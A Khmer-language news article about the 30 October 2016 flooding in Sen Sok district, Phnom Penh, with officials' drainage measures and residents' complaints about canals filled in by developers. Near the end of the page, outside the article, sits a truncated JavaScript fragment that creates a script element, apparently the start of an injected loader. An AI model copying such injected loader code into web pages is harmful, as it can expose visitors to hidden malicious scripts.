Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

អជ្ញាធរខណ្ឌសែនសុខចុះមើលទឹកជន់លិចក្នុងមូលដ្ឋាននិងកាយប្រឡាយរំដោះទឹក

ភ្នំពេញ ៖ក្រោយពីមានភ្លៀងធ្លាក់ជាប់ៗគ្នានាព្រឹកថ្ងៃទី៣០ ខែតុលា ឆ្នាំ២០១៦នេះអាជ្ញាធរខណ្ឌសែនសុខដឹកនាំដោយលោក ប៉ឹល កុសល អភិបាលខណ្ឌសែន លោក ម៉ក់ ហុង អធិការខណ្ឌ និងលោក ជុំ សារ៉ាយ ចៅសង្កាត់ភ្នំពេញថ្មីរួមទាំង

មន្ត្រីពាក់ព័ន្ធមួយចំនួនចុះត្រួតពិនិត្យនិងយកគ្រឿងចក្រកាយរំដោះជំនន់ទឹកភ្លៀងដែលជន់លិចផ្លូវផ្ទះសម្បែងរបស់ពលរដ្ឋមួយចំនួនក្នុងភូមិសាស្រ្តសង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខនិងទីតាំងមួយចំនួនទៀតតាមព្រំប្រទល់តាមបណ្តាលខណ្ឌជាប់គ្នា ។

លោកអភិបាលបានឱ្យដឹងថាដោយបានគោលការណ៍ពីឯកឧត្តម ប៉ា សុជាតិវង្ស អភិបាលនៃគណៈអភិបាលរាជធានីភ្នំពេញបានដាក់ចេញវិធានការណ៍បន្ទាន់ ដូចខាងក្រោមៈ

១-មន្ទីរសាធារណការនិងដឹកជព្ជាូនដាក់គ្រឿងចក្រចុះកាយស្តារភក់ប្រឡាយស្របផ្លូវរថភ្លេីង ។
២-សាលាខណ្ឌសែន សុខ ពោធិសែនជ័យសម្រប
សម្រួលជាមួយម្ចាស់ដីដេីម្បីជីកប្រឡាយភ្ជាប់ពីផ្លូវរថភ្លេីងដល់បុរីកំពុងសាងសង់។
៣-ទីតាំងបុរីម្ចាស់បុរីឯកភាពកាយសំរាមពីមុខលូ
បណ្តោះអាសន្នហេីយចំពោះមុខម្ចាស់សុខចិត្តកាយចេញបណ្តាញលូទំហំ ១.៥ម ចំនួន ២ខ្សែដែលបានដាក់រួចតាមសំណេីក្រុមការងារដោយជំនួសដោយការធ្វេីប្រឡាយចំហទទឹង ៨ម៉ែត្រ។
៤-ទីតាំងប្រឡាយពីបុរីទៅភ្ជាប់ប្រឡាយទួលសំពៅ មន្ទីរនឹងចុះកាយស្តារភក់ កំបោក ស្មៅត្រែង និងឯកភាពអោយធ្វេីស្ពានឆ្លងកាត់ប្រឡាយជំនួសដោយការការដាក់លូទំហំតូច ។

តាមមតិប្រជាពលរដ្ឋវិញ បានឲ្យដឹងថា រាល់សំណង់នានាចាក់លុបដីឡូតិ៍រួមទាំងលំនៅដ្ឋានរបស់ពលរដ្ឋផង ពេលដែលសុំច្បាប់សាងសង់ អាជ្ញាធរថ្វីបើសម្រេចអនុញាតិក៏ពិតមែន តែប្រព័ន្ធ លូ
បង្ហូរទឹកស្អុយ ហាក់បីដូចជាខាងអាជ្ញាធរ មិនចុះទៅមើលឡើយសាងសង់ពុំត្រូវតាមបច្ចេកទេស ពុំត្រូវតាមស្តង់ដាដាក់លូទៅតាមបុគ្គលម្ចាស់ទីតាំងពេញចិត្តនិងទីតាំងមួយចំនួនត្រូវបានអ្នកមានលុយ មានអំណាច ចាក់ដីលុបប្រឡាយ យកធ្វើជាកម្មសិទ្ធប្រយោជន៍ផ្ទាល់ខ្លួនលួចចាក់ដីលុបចិញ្ចើមប្រឡាយដើម្បីពង្រីកដីខ្លួន ។ល។

បាតុភាពនិងទង្វើរទាំងនេះហើយទើបប្រព័ន្ធបង្ហូររំដោះទឹក មានបញ្ហា កកស្ទះស្មៅ កំប្លោក សម្រាម ដែលប្រឈមមុខទៅនឹង វិប្បត្តិទឹកជន់លិចផ្លូវ លំនៅដ្ឋាន ។

តែទោះជាយ៉ាងណាក៏ដោយក្រោយពីទីតាំងមួយចំនួនជួបនូវវិប្បត្តិទឹកភ្លៀងជន់លិច ឃើញថាថ្នាក់ដឹកនាំខណ្ឌបានចុះនិងដើរមើលដើម្បីរំដោះកាលិចលង់ខាងលើនេះ៕

img_4453img_4449

img_4421 img_4423 img_4428 img_4429 img_4453 img_4455 img_4456 img_4460 img_4461 img_4462 img_4464 img_4467 img_4470 img_4471 img_4472 img_4473 img_4477

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More